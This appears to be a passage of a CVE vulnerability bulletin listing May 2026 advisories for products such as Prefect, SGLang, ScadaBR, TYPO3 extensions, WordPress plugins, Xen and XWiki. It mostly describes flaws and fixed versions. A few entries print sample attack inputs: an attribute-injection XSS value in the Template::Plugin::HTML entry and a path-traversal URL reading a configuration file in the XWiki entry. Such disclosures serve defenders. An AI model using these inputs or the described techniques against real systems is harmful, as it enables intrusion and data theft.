| prefecthq--prefecthq/prefect | A vulnerability in the `GitHubRepository` block of the `prefect-github` integration in Prefect version 3.6.18 allows an attacker to inject arbitrary git command-line options via the `reference` field. The `reference` field is concatenated directly into a `git clone` command string without proper sanitization, and then parsed by `shlex.split()`. This enables injection of options such as `-c`, leading to potential Server-Side Request Forgery (SSRF), credential theft, or remote code execution (RCE). The vulnerability affects both the `aget_directory()` and `get_directory()` methods in `src/integrations/prefect-github/prefect_github/repository.py`. This issue does not affect the GitLab and BitBucket integrations, which use a safer list-based command construction approach. | 2026-05-24 | not yet calculated | CVE-2026-3515 | https://huntr.com/bounties/f3b048b8-7f4e-45ef-a5a7-cb841c39acde |
| PrestaShop--upsshipping module | An issue in prestashop upsshipping all versions through at least 2.4.0 allows a remote attacker to obtain sensitive information via the /modules/upsshipping/logs/, and /modules/upsshipping/lib/UPSBaseApi.php components | 2026-05-18 | not yet calculated | CVE-2026-39079 | https://labs.esokia.com/cve/cve-2026-39079/ |
| Rocket.Chat--Rocket.Chat | The /api/v1/autotranslate.translateMessage endpoint in versions <8.5.0, <8.4.2, <8.3.4, <8.2.4, <8.1.5, <8.0.6, <7.13.8, and <7.10.12 allows any authenticated user to retrieve the full content of any message from any room (private groups, direct messages, channels) by simply providing the target message ID. The endpoint fetches the message via Messages.findOneById(messageId) with no room access check (canAccessRoomIdAsync is never called), returning the complete IMessage object including message text, sender info, room ID, timestamps, and markdown content. | 2026-05-19 | not yet calculated | CVE-2026-32994 | https://hackerone.com/reports/3713682 |
| RRWO--Crypt::SaltedHash | Crypt::SaltedHash versions through 0.09 for Perl generate insecure random values for salts. These versions use the built-in rand function, which is predictable and unsuitable for cryptography. | 2026-05-20 | not yet calculated | CVE-2026-47372 | https://metacpan.org/release/RRWO/Crypt-SaltedHash-0.10/changes https://github.com/robrwo/perl-Crypt-SaltedHash/commit/9b68437d2cd420b819b3a795474c3870338d38d5.patch |
| RRWO--Crypt::SaltedHash | Crypt::SaltedHash versions through 0.09 for Perl is susceptible to timing attacks. These versions use Perl's built-in eq comparison. Discrepencies in timing could be used to guess the underlying hash. | 2026-05-20 | not yet calculated | CVE-2026-47373 | https://metacpan.org/release/RRWO/Crypt-SaltedHash-0.10/changes https://github.com/robrwo/perl-Crypt-SaltedHash/commit/c07bfc5c23185b0667233d0f2e1252d81f1f027a.patch |
| RRWO--Net::Statsd::Lite | Net::Statsd::Lite versions through 0.10.0 for Perl allowed metric injections. The values from the set_add method were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. Note that version 0.9.0 fixed a similar issue CVE-2026-46719 for metric names. | 2026-05-18 | not yet calculated | CVE-2026-8788 | https://metacpan.org/release/RRWO/Net-Statsd-Lite-v0.10.1/changes https://www.cve.org/CVERecord?id=CVE-2026-46719 |
| ScadaBR--ScadaBR | In ScadaBR version 1.2.0, a Missing Authentication for Critical Function vulnerability could allow an unauthenticated attacker to send a HTTP GET requests to the SCADA system and inject arbitrary sensor readings. | 2026-05-19 | not yet calculated | CVE-2026-8602 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| ScadaBR--ScadaBR | In ScadaBR version 1.2.0, an OS Command Injection vulnerability could allow an attacker to execute commands as root on the SCADA system. | 2026-05-19 | not yet calculated | CVE-2026-8603 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| ScadaBR--ScadaBR | In ScadaBR version 1.2.0, a CSRF vulnerability could allow an attacker to trigger any authenticated action through a victim's session by luring any logged-in user to a malicious webpage. | 2026-05-19 | not yet calculated | CVE-2026-8604 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| ScadaBR--ScadaBR | In ScadaBR version 1.2.0, a Use of Hard-Coded Credentials vulnerability could allow an attacker to access the SCADA system as admin. | 2026-05-19 | not yet calculated | CVE-2026-8605 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| scalar--astro v0.1.13 | scalar/astro v0.1.13 was discovered to contain an arbitrary file upload vulnerability in the the scalar_url query parameter of the Scalar Proxy endpoint. This vulnerability allows attackers to execute arbitrary code via uploading a crafted SVG file. | 2026-05-19 | not yet calculated | CVE-2026-30117 | https://github.com/prassan10/XSS-Open-Redirect-via-scalar_url |
| scalar--astro v0.1.13 | scalar/astro v0.1.13 was discovered to contain a Server-Side Request Forgery (SSRF) in the scalar_url query parameter of the Scalar Proxy endpoint. This vulnerability allows unauthenticated attackers to force the backend server to send HTTP requests to attacker-controlled URLs, leading to authentication cookies and headers exposure and possible privilege escalation. | 2026-05-19 | not yet calculated | CVE-2026-30118 | https://github.com/prassan10/ssrf-zero-click-ato-scalar |
| SGLang--SGLang | SGLangs multimodal generation runtime scheduler's ROUTER socket binds to 0.0.0.0 by default and contains a sink that calls pickle.loads() on incoming messages, enabling RCE when exposed to the internet. | 2026-05-18 | not yet calculated | CVE-2026-7301 | https://github.com/sgl-project/sglang/tree/main/python/sglang https://antiproof.ai/blog/three-rces-in-sglang/ |
| SGLang--SGLang | SGLangs multimodal generation runtime is vulnerable to an unauthenticated path traversal vulnerability, allowing an attacker to write arbitrary files anywhere the server process has write access, by including ../ sequences in the upload filename when sent to specific endpoints. | 2026-05-18 | not yet calculated | CVE-2026-7302 | https://github.com/sgl-project/sglang/tree/main/python/sglang https://antiproof.ai/blog/three-rces-in-sglang/ |
| SGLang--SGLang | SGLangs multimodal generation runtime is vulnerable to unauthenticated remote code execution when the --enable-custom-logit-processor option is enabled, as Python objects loaded via dill.loads() will be deserialized without validation. | 2026-05-18 | not yet calculated | CVE-2026-7304 | https://github.com/sgl-project/sglang/tree/main/python/sglang https://antiproof.ai/blog/three-rces-in-sglang/ |
| Siber Systems, Inc.--Android App "RoboForm Password Manager" | Android App "RoboForm Password Manager" provided by Siber Systems, Inc. handles Android intents without sufficient URL validation, user confirmation nor notification. If a URL to some malicious web page is given through an intent, RoboForm may silently download files without user confirmation nor notification. | 2026-05-20 | not yet calculated | CVE-2026-47782 | https://play.google.com/store/apps/details?id=com.siber.roboform https://www.roboform.com/news-android https://jvn.jp/en/vu/JVNVU93461473/ |
| simplesamlphp--simplesamlphp-module-casserver | SimpleSAMLphp-casserver is a CAS 1.0 and 2.0 compliant CAS server in the form of a SimpleSAMLphp module. In versions below 6.3.1 and 7.0.0, the logout endpoint accepts a url query parameter to redirect to. casserver treats that url as trusted, and either (depending on configuration) redirects the browser there, or shows a "you've been logged out" page with a link to continue to that url. Impacted configs include 'enable_logout' => true, and 'skip_logout_page' -> true. This issue has been resolved in versions 6.3.1 and 7.0.0. | 2026-05-18 | not yet calculated | CVE-2025-65954 | https://github.com/simplesamlphp/simplesamlphp-module-casserver/security/advisories/GHSA-cvrm-5hp6-h523 https://github.com/simplesamlphp/simplesamlphp-module-casserver/commit/0462f50f00b3bb300d83067d11b74146a57bb8e0 https://github.com/simplesamlphp/simplesamlphp-module-casserver/commit/fb6c6f1c7b9e757c93c5c306e1d36405e64f6dc5 |
| Six Apart Ltd.--Movable Type | Missing authorization vulnerability exists in Movable Type. Under certain conditions, when a user without administrator privileges signs in to the product, unintended update processing may be executed. | 2026-05-20 | not yet calculated | CVE-2026-44392 | https://movabletype.org/news/2026/05/mt-908-released.html https://www.sixapart.jp/movabletype/news/2026/05/20-1100.html https://jvn.jp/en/jp/JVN66473735/ |
| Sparx Systems--Enterprise Architect | Sparx Enterprise Architect software has a security feature that limits user's actions to those specified in the role. An authenticated attacker can modify the Enterprise Architect client behavior (e.g. using a debugger) and log in as any other user or administrator - then it is possible to do every possible change to the repository. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 17.1 and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42098 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/ea/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems--Pro Cloud Server | Sparx Pro Cloud Server is vulnerable to Broken Access Control within communication with the database. Due to lack of permission checks, any low privileged user can run arbitrary SQL queries within database user context. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42096 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems--Pro Cloud Server | Sparx Pro Cloud Server requires authentication based on requested URL. An attacker can omit the "model" query parameter and send the model name only in the binary blob in POST request allowing SQL query execution without authentication. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42097 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems--Pro Cloud Server | Sparx Pro Cloud Server is vulnerable to a Race Condition in the /data_api/dl_internal_artifact.php endpoint. The application downloads the properties of the object pointed by guid parameter and saves loaded content in current location (__DIR__) under the specified name. An attacker with repository access can control both the filename and file contents, allowing the creation of a malicious PHP file in a current directory. Although the file is deleted after processing, a race condition exists: if the response transmission is delayed (e.g., via a large file or slow client connection), the file remains accessible. During this window, the attacker can issue a second request to execute the malicious PHP file, resulting in remote code execution. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42099 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems--Pro Cloud Server | Improper Handling of Syntactically Invalid Structure in Sparx Pro Cloud Server allows Denial of Service (DoS) attack to be executed by sending an specially crafted SQL query. This causes the Pro Cloud Server service to terminate unexpectedly. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42100 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, a crafted HEIF sequence file where the saiz box declares more samples than actually exist in the track's chunk table causes a heap-buffer-overflow (out-of-bounds read) in the SampleAuxInfoReader constructor. The SampleAuxInfoReader constructor iterates over saiz->get_num_samples() samples but doesn't validate that this count is consistent with the number of chunks in the chunks vector. When saiz declares more samples than the chunks cover, the loop increments current_chunk past chunks.size(), causing an out-of-bounds read on the chunks vector. The vulnerability is triggered during file parsing (heif_context_read_from_file) without any additional user interaction. Any application using libheif to open untrusted HEIF files is affected. This issue has been fixed in version 1.22.0. | 2026-05-22 | not yet calculated | CVE-2026-41071 | https://github.com/strukturag/libheif/security/advisories/GHSA-xj92-xjff-h8w3 https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| TCHATZI--Authen::TOTP | Authen::TOTP versions before 0.1.1 for Perl generate secrets using rand. Secrets were generated using Perl's built-in rand function, which is predictable and unsuitable for security usage. | 2026-05-21 | not yet calculated | CVE-2026-46473 | https://metacpan.org/release/TCHATZI/Authen-TOTP-0.1.1/changes https://github.com/tchatzi/Authen-TOTP/commit/d04f30cc6538d77fc6b6d550da450cf3017b8561.patch |
| The Qt Company--Qt | An Uncontrolled Search Path Element vulnerability in the OpenSSL TLS backend of Qt Network (qtbase) in Qt Qt Framework (Unix) allows a local attacker to load a rogue CA certificate as a trusted system authority via a crafted certificate file placed in the application's working directory. | 2026-05-19 | not yet calculated | CVE-2025-14575 | Gerrit: QSslCertificate::fromPath — reject empty path strings (Qt 6.9.2+) |
| Thermo Fisher--Scientific Torrent Suite Dx | Thermo Fisher Scientific Torrent Suite Dx through 5.14.2 has a privilege escalation vulnerability that may allow an authenticated user with limited access privileges to gain unauthorized administrator-level privileges through exploitation of specific system interfaces. | 2026-05-18 | not yet calculated | CVE-2026-41085 | https://thermofisher.com https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/TorrentSuiteDxSoftware_v5_14_2.pdf |
| tinyMQTT--tinyMQTT | In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), the broker mishandles protocol violations during CONNECT packet parsing. When receiving a CONNECT packet with a zero-length Client ID while CleanSession is set to 0, the broker correctly replies with a CONNACK return code 0x02 (Identifier Rejected) but fails to explicitly close the TCP connection. Since the surrounding connection teardown logic is not guaranteed to execute, each such invalid CONNECT attempt leaves the underlying socket open. Repeated attempts cause server-side resource exhaustion due to accumulating file descriptors and memory usage, potentially resulting in denial of service. | 2026-05-18 | not yet calculated | CVE-2025-56352 | https://github.com/JustDoIt0910/tinyMQTT/issues/19 |
| TODDR--Template::Plugin::HTML | Template::Plugin::HTML versions through 3.102 for Perl allows HTML and JavaScript to be injected. The html_filter function did not escape single quotes. HTML attributes inside of single quotes could be have code injected. For example, the variable "var" in <a id='ref' title='[% var | html %]'> would not be properly escaped. An attacker could insert some limited HTML and JavaScript, for example, var = " ' onclick='while (true) { alert(1) }'" Note that arbitrary HTML and JavaScript would be difficult to inject, because angle brackets, ampersands and double-quotes would still be escaped. | 2026-05-19 | not yet calculated | CVE-2026-5090 | https://github.com/abw/Template2/issues/327 https://github.com/abw/Template2/pull/337/changes/11c78a7a771d4af505efeb754a0b8775689c2eae |
| TP-Link Systems Inc.--Archer AX72 (SG) v1.0 | In the web management interface of Archer AX72 (SG) v1, the network diagnostic feature improperly handles invalid user input, resulting in limited exposure of diagnostic command usage information. An authenticated attacker with administrative privileges could exploit this issue to confirm the presence of the diagnostic utility and view its valid command-line syntax and options. The exposed information is limited in scope and does not include sensitive system data. | 2026-05-19 | not yet calculated | CVE-2026-5511 | https://www.tp-link.com/sg/support/download/archer-ax72/#Firmware https://www.tp-link.com/us/support/faq/5096/ |
| TP-Link Systems Inc.--Archer RE650 v1 | An authentication logic vulnerability in multiple TP-Link range extenders allows an unauthenticated attacker on an adjacent network to manipulate a login parameter and reset the administrator password due to insufficient validation. Successful exploitation allows an attacker to obtain full administrative control of the affected device, potentially impacting on confidentiality, integrity, and availability. | 2026-05-22 | not yet calculated | CVE-2026-3294 | https://www.tp-link.com/en/support/download/re650/v1/#Firmware https://www.tp-link.com/us/support/download/re650/v1/#Firmware https://www.tp-link.com/us/support/download/re305/v1/#Firmware https://www.tp-link.com/en/support/download/re305/v1/#Firmware https://www.tp-link.com/us/support/download/re360/v1/#Firmware https://www.tp-link.com/en/support/download/re360/v1/#Firmware https://www.tp-link.com/us/support/download/tl-wa860re/v4/#Firmware https://www.tp-link.com/en/support/download/tl-wa860re/v4/#Firmware https://www.tp-link.com/en/support/download/re580d/#Firmware https://www.tp-link.com/us/support/download/re580d/#Firmware https://www.tp-link.com/us/support/faq/5101/ |
| Trend Micro, Inc.--TrendAI Apex One (Mac) | An origin validation error vulnerability in the Trend Micro Apex One (mac) agent iCore service could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71214 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-139/ |
| Trend Micro, Inc.--TrendAI Apex One (Mac) | A time-of-check time-of-use vulnerability in the Trend Micro Apex One (mac) agent iCore service signature verification could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71215 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-141/ |
| Trend Micro, Inc.--TrendAI Apex One (Mac) | A time-of-check time-of-use vulnerability in the Trend Micro Apex One (mac) agent cache mechanism could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71216 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-142/ |
| Trend Micro, Inc.--TrendAI Apex One (Mac) | An origin validation error vulnerability in the Trend Micro Apex One (mac) agent self-protection mechanism could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71217 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-143/ |
| Trimble--SketchUp | A cross-site scripting (XSS) vulnerability in SketchUp 2026's Dynamic Components feature allows remote code execution and local file exfiltration through maliciously crafted SKP files. The vulnerability stems from improper input sanitization in the component options window, enabling attackers to execute arbitrary system commands and read local files without user interaction by exploiting an embedded Internet Explorer 11 browser. | 2026-05-22 | not yet calculated | CVE-2026-9264 | https://trust.trimble.com/?tcuUid=52252bc0-c196-4b1f-9f13-4e4c9ba247d9 |
| TYPO3--Extension "Address List" | The AddressRepository::getSqlQuery() method constructs a database query without properly sanitizing user input, leading to SQL Injection. The method is not invoked anywhere within the extension itself and therefore poses no direct risk in a default installation. However, custom extensions that call this method with untrusted input would expose the site to SQL injection. | 2026-05-19 | not yet calculated | CVE-2026-8827 | https://typo3.org/security/advisory/typo3-ext-sa-2026-012 |
| TYPO3--Extension "Content Element Selector" | The extension passes an attacker-controlled cookie directly to PHP's unserialize() without safely processing the input. A remote, unauthenticated attacker can supply a crafted serialized payload to trigger PHP Object Injection, leading to Remote Code Execution on the TYPO3 server. Exploitation requires the content element to be configured with "Persistent Mode: Static" in the plugin settings. | 2026-05-19 | not yet calculated | CVE-2026-46725 | https://typo3.org/security/advisory/typo3-ext-sa-2026-013 |
| TYPO3--Extension "Faceted Search" | The OOXML parsing of the file indexer does not disable external entity resolution. A crafted xlsx or pptx document placed in an indexed directory can cause local files to be read or outbound HTTP requests to be performed, with the retrieved content being written to the search index. | 2026-05-19 | not yet calculated | CVE-2026-46722 | https://typo3.org/security/advisory/typo3-ext-sa-2026-011 |
| TYPO3--Extension "Faceted Search" | The additional_tables configuration of the page and tt_content indexers accepts arbitrary table and field names. A backend user with permission to edit indexer configurations can copy sensitive data from internal TYPO3 tables into the search index. | 2026-05-19 | not yet calculated | CVE-2026-46723 | https://typo3.org/security/advisory/typo3-ext-sa-2026-011 |
| TYPO3--Extension "Faceted Search" | The file indexer does not normalize the configured directory path. A backend user with permission to edit indexer configurations can index documents from arbitrary locations on the server file system through path traversal sequences. | 2026-05-19 | not yet calculated | CVE-2026-46724 | https://typo3.org/security/advisory/typo3-ext-sa-2026-011 |
| TYPO3--Extension "Frontend User Registration" | The create and edit flows do not restrict which user properties may be submitted and do not enforce access control on the frontend user group assignment. As a result, an attacker can assign an arbitrary frontend user group to a newly registered or edited account, gaining unauthorized access to content and functionality restricted to privileged frontend user groups. | 2026-05-19 | not yet calculated | CVE-2026-46721 | https://typo3.org/security/advisory/typo3-ext-sa-2026-009 |
| TYPO3--Extension "News system" | The extension fails to properly sanitize user input before using it in a database query. As a result, an unauthenticated attacker can inject arbitrary SQL through a URL parameter on pages using the "Date Menu of news articles" plugin. Exploitation requires the "Date Menu of news articles" plugin to be in use and the TypoScript/Plugin setting disableOverrideDemand not to be enabled. | 2026-05-19 | not yet calculated | CVE-2026-8726 | https://typo3.org/security/advisory/typo3-ext-sa-2026-010 |
| TYPO3--Extension "Site Crawler" | The Crawler extension passes the X-T3Crawler-Meta response header from crawled URLs directly to PHP's unserialize(). An attacker controlling a crawled endpoint can inject arbitrary serialized PHP objects, leading to Remote Code Execution on the TYPO3 server. Exploitation requires administrative privileges to configure a crawler-enabled page and trigger the crawl via a Scheduler task. | 2026-05-19 | not yet calculated | CVE-2026-8727 | https://typo3.org/security/advisory/typo3-ext-sa-2026-008 |
| Unknown--Ajax Load More | The Ajax Load More WordPress plugin before 7.8.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2026-05-18 | not yet calculated | CVE-2026-6495 | https://wpscan.com/vulnerability/c52f28c5-547d-48ae-89dd-edcdaeadcec5/ |
| Unknown--Autoptimize | The Autoptimize WordPress plugin before 3.1.15, Clearfy Cache WordPress plugin before 2.4.2, Speed Optimizer WordPress plugin before 7.7.9 are vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) due to a predictable replacement hash used during the HTML minification process and abusing a regular expression. This allows an attacker to inject arbitrary HTML attributes in the final HTML output by anticipating the placeholder format. | 2026-05-18 | not yet calculated | CVE-2026-3220 | https://wpscan.com/vulnerability/3ceabf11-23cd-4c38-ba14-014348b0ff2d/ |
| Unknown--Decent Comments | The Decent Comments WordPress plugin before 3.0.2 does not restrict access to comment author email addresses and post author email addresses via its REST API endpoint, allowing unauthenticated attackers to enumerate registered user email addresses. | 2026-05-20 | not yet calculated | CVE-2026-7385 | https://wpscan.com/vulnerability/1c5949d0-cf50-45d3-a7e2-2f94cdb42405/ |
| Unknown--Email Encoder | The Email Encoder WordPress plugin before 2.4.7 does not escape email addresses retrieved via user input, allowing unauthenticated attackers to perform Stored XSS attacks | 2026-05-20 | not yet calculated | CVE-2026-5776 | https://wpscan.com/vulnerability/00c0b9f7-c559-463e-80ae-97d99e0ef99f/ |
| Unknown--Feeds for YouTube (YouTube video, channel, and gallery plugin) | The Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4 is vulnerable to unauthorized modification of the Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4's license key due to a missing capability check on the 'actions' function. This makes it possible for subscribers and above delete the license key. | 2026-05-18 | not yet calculated | CVE-2026-1631 | https://wpscan.com/vulnerability/b19596c2-69bc-4e15-8632-eb80f4577e3c/ |
| Unknown--Fortis for WooCommerce | The Fortis for WooCommerce WordPress plugin before 1.3.1 may leak sensitive API keys to unauthenticated attackers, allowing them to query Fortis' API and retrieve sensitive customer information, like past orders, PII, etc. | 2026-05-19 | not yet calculated | CVE-2025-15609 | https://wpscan.com/vulnerability/220f72ea-e3b4-44c9-8c9b-15662aebb6cb/ |
| Unknown--WP Maps | The WP Maps WordPress plugin before 4.9.3 does not properly sanitize a parameter before using it in a file path, allowing authenticated users to perform Local File Inclusion attacks. | 2026-05-18 | not yet calculated | CVE-2026-6381 | https://wpscan.com/vulnerability/18b36672-58d7-44fa-b653-b728e9ef257a/ |
| Unknown--WP Photo Album Plus | The WP Photo Album Plus WordPress plugin before 9.1.11.001 does not properly sanitize and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks. | 2026-05-18 | not yet calculated | CVE-2026-6379 | https://wpscan.com/vulnerability/60b88fd2-4048-4773-b319-63caaf5bd8eb/ |
| vaadin--flow | A possible information disclosure vulnerability exists in the Vaadin Maven plugin and Vaadin Gradle plugin that exposes the full set of environment variables in build logs whenever the frontend build process exits with a non-zero status. Because the build environment may contain credentials supplied as secrets, any failed frontend build can expose those secrets in clear text in CI logs and archived build artifacts. Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include: Product version Vaadin 23.0.0 - 23.6.9 Vaadin 24.0.0 - 24.9.16 Vaadin 24.10.0 - 24.10.3 Vaadin 25.0.0 - 25.0.10 Vaadin 25.1.0 - 25.1.4 Mitigation Upgrade to 23.6.10 Upgrade to 24.9.17 or newer Upgrade to 24.10.4 or newer Upgrade to 25.0.11 or newer Upgrade to 25.1.5 or newer Please note that Vaadin versions 10-13 and 15-22 are no longer supported and you should update either to the latest 23, 24, or 25 version. ArtifactsMaven coordinatesVulnerable versionsFixed versioncom.vaadin:flow-plugin-base23.0.0 - 23.6.10≥23.6.11com.vaadin:flow-plugin-base24.0.0 - 24.9.17≥24.9.18com.vaadin:flow-plugin-base24.10.0 - 24.10.3≥24.10.4com.vaadin:flow-plugin-base25.0.0 - 25.0.11≥25.0.12com.vaadin:flow-plugin-base25.1.0 - 25.1.4≥25.1.5com.vaadin:flow-maven-plugin23.0.0 - 23.6.10≥23.6.11com.vaadin:flow-maven-plugin24.0.0 - 24.9.17≥24.9.18com.vaadin:flow-maven-plugin24.10.0 - 24.10.3≥24.10.4com.vaadin:flow-maven-plugin25.0.0 - 25.0.11≥25.0.12com.vaadin:flow-maven-plugin25.1.0 - 25.1.4≥25.1.5com.vaadin:flow-gradle-plugin24.0.0 - 24.9.17≥24.9.18com.vaadin:flow-gradle-plugin24.10.0 - 24.10.3≥24.10.4com.vaadin:flow-gradle-plugin25.0.0 - 25.0.11≥25.0.12com.vaadin:flow-gradle-plugin25.1.0 - 25.1.4≥25.1.5 | 2026-05-19 | not yet calculated | CVE-2026-7860 | https://vaadin.com/security/cve-2026-7860 https://github.com/vaadin/flow/pull/24219 |
| vifm--vifm | vifm is vulnerable to a heap buffer overflow during the history merge process when saving the state file (vifminfo.json). This flaw occurs because the application lacks a runtime check on the length of history entries in release builds, potentially allowing a crafted long path or command in the history to cause memory corruption or application crashes. Releases from 0.12.1 to 0.14.3 (including) are considered vulnerable. This issue was fixed in commit 23063c7 | 2026-05-22 | not yet calculated | CVE-2026-8997 | https://cert.pl/en/posts/2026/05/CVE-2026-8997 https://github.com/vifm/vifm/commit/23063c741f15a85621fd232dfc3ac5b779f6910d |
| WineHQ--Wine | Wine ships a .desktop file that registers itself as a MIME handler for EXE files and several other Windows executable file types. In some configurations, handling of an EXE file causes that file to be blindly executed with the permissions of the invoker. This allows escaping Flatpak and Snap sandboxes, because MIME handlers are not intended for use by code interpreters and loaders. NOTE: some parties feel that this is not a bug to be addressed in Wine, because there is no known solution that avoids a severe loss of usability (Wine could be a binfmt-misc handler, but binfmt-misc does not exist on all platforms supported by Wine). | 2026-05-24 | not yet calculated | CVE-2026-48831 | https://bugs.winehq.org/show_bug.cgi?id=59767 https://www.openwall.com/lists/oss-security/2026/05/19/1 |
| Xen--Xen | Any guest can cause xenstored to crash by issuing a XS_RESET_WATCHES command within a transaction due to an assert() triggering. In case xenstored was built with NDEBUG #defined nothing bad will happen, as assert() is doing nothing in this case. Note that the default is not to define NDEBUG for xenstored builds even in release builds of Xen. | 2026-05-19 | not yet calculated | CVE-2026-23557 | https://xenbits.xenproject.org/xsa/advisory-484.html |
| Xen--Xen | The adjustments made for XSA-379 as well as those subsequently becoming XSA-387 still left a race window, when a HVM or PVH guest does a grant table version change from v2 to v1 in parallel with mapping the status page(s) via XENMEM_add_to_physmap. Some of the status pages may then be freed while mappings of them would still be inserted into the guest's secondary (P2M) page tables. | 2026-05-19 | not yet calculated | CVE-2026-23558 | https://xenbits.xenproject.org/xsa/advisory-486.html |
| xwiki--xwiki-commons | XWiki Platform is a generic wiki platform. Versions prior to 18.1.0-rc-1, 17.10.3, 17.4.9, and 16.10.17 allow access to read configuration files by using URLs such as http://localhost:8080/bin/ssx/Main/WebHome?resource=/../../WEB-INF/xwiki.cfg&minify=false, leading to Path Traversal. The vulnerability is can be exploited via resources parameter the ssx and jsx endpoints by using leading slashes. This issue has been patched in 18.1.0-rc-1, 17.10.3, 17.4.9, 16.10.17. | 2026-05-20 | not yet calculated | CVE-2026-23734 | https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-xq3r-2qv5-vqqm https://github.com/xwiki/xwiki-commons/commit/a979cafd89f6a9c9c0b9ab19744d672df64429bf https://jira.xwiki.org/browse/XCOMMONS-3547 |
| xwiki--xwiki-platform | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. XWiki Platform is a generic wiki platform. In versions prior to 18.1.0-rc-1, 17.10.3, 17.4.9, and 16.10.17, the POST /wikis/{wikiName} API executes a XAR import without performing any authentication or authorization checks, allowing an unauthenticated attacker to create or update documents in the target wiki. This vulnerability has been patched in XWiki 16.10.17, 17.4.9, 17.10.3, 18.0.1 and 18.1.0-rc-1. | 2026-05-20 | not yet calculated | CVE-2026-33137 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qrvh-r3f2-9h4r https://github.com/xwiki/xwiki-platform/commit/4b7b95b79256374d487e9ece1dc48f527966990f https://jira.xwiki.org/browse/XWIKI-23953 |
| Zenshin--hitarth-gg | An OS command injection vulnerability in the /stream-to-vlc Express route in hitarth-gg Zenshin before 2.7.0 allows remote attackers to execute arbitrary commands via the url parameter. | 2026-05-19 | not yet calculated | CVE-2026-37281 | https://github.com/hitarth-gg/zenshin https://github.com/hitarth-gg/zenshin/commit/7d31c6edfbac978f0ad44c66d761bab9dcd2fa27 https://gist.github.com/MitruStefan/cf016709252aabbec7f95b7a70e0cfba |
